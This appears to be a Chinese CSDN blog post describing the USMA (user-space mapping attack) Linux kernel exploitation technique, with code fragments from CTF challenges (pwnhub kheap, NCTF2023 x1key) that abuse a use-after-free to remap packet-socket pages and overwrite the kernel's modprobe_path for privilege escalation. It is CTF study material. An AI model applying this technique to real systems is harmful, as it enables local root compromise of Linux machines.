attack demo - USMA

文章描述了USMA漏洞,即用户空间映射攻击,通过让普通用户进程映射内核内存并修改内核代码段,绕过Linux内核的控制措施,实现内核态代码执行。讨论了不同比赛中的具体案例,如NCTF和N1CTF,以及攻击者如何利用UAF和系统调用来获取权限。
摘要由CSDN通过智能技术生成

USMA(User-Space-Mapping-Attack)

允许普通用户进程可以映射内核态内存并且修改内核代码段,通过这个方法,我们可以绕过Linux内核中的CFI缓解措施,在内核态中执行任意代码
360漏洞研究院:USMA:用户态映射攻击
视频
文档

pwnhub 3月公开赛 - kheap

0x20 大小的 UAF,开启了 SMEP\KASLR
之前的方式是通过seq_operation结构体函数指针劫持 + 栈迁移,绕过SMEP
参考


下面链接使用的是USMA
参考
核心代码


int packet_fd = pagealloc_pad(0x20 / 8, 4096);  // 什么分配4个0x1000大小page, struct pgv *pg_vec; 分配符合UAF大小0x20
read(fd, buf, 0x20);
binary_dump("pg_vec data", buf, 0x20);
*(size_t*)buf = modprobe_path - 0x2e0;
write(fd, buf, 0x20);       // 对pg_vec中的虚拟地址进行覆写
char *page = NULL, *modprobe_path_ptr = NULL;
page = mmap(NULL, 0x1000*(0x20 / 8), PROT_READ|PROT_WRITE, MAP_SHARED, packet_fd, 0);	// 通过pg_vec,把modprobe_path_ptr所在的页,映射到用户态
modprobe_path_ptr = page + 0x2e0;
puts(modprobe_path_ptr);

strcpy(modprobe_path_ptr, "/home/x");

【dir+USMA】NCTF2023 - x1key

也是0x20大小的UAF,没有读方法,不能泄露内核地址
参考

unshare_setup();
fd = open("/dev/x1key", O_RDONLY);

int shm_fd = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT|0666);
char* shm_ptr = shmat(shm_fd, NULL, SHM_RDONLY); // 申请0x20,要被上溢的slab

add();  // vuln slab

shmdt(shm_ptr); // 释放

int nr = 0x20 / 8;
int packet_fd = pagealloc_pad(nr, 0x1000);  // 占据 shm_file_data 

char *page = NULL, *modprobe_path = NULL;
for (int i = 0; i < 0x80; i++)
{
        edit(0, (i<<20)|0x2a000);   // 修改packet_fd中的pg_vec
        page = mmap(NULL, 0x1000*nr, PROT_READ|PROT_WRITE, MAP_SHARED, packet_fd, 0);
        if (page == -1) continue;
        modprobe_path = page + 0x1000*(nr-1) + 0xc0;
        if (!strcmp(modprobe_path, "/sbin/modprobe")) break;
        munmap(page, 0x1000*nr);
}

strcpy(modprobe_path, "/tmp/x");

N1CTF 2022 praymoon

参考
这个是通过__sys_setresuid进行提权的,单单USMA利用逻辑上和原始文章一致

  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值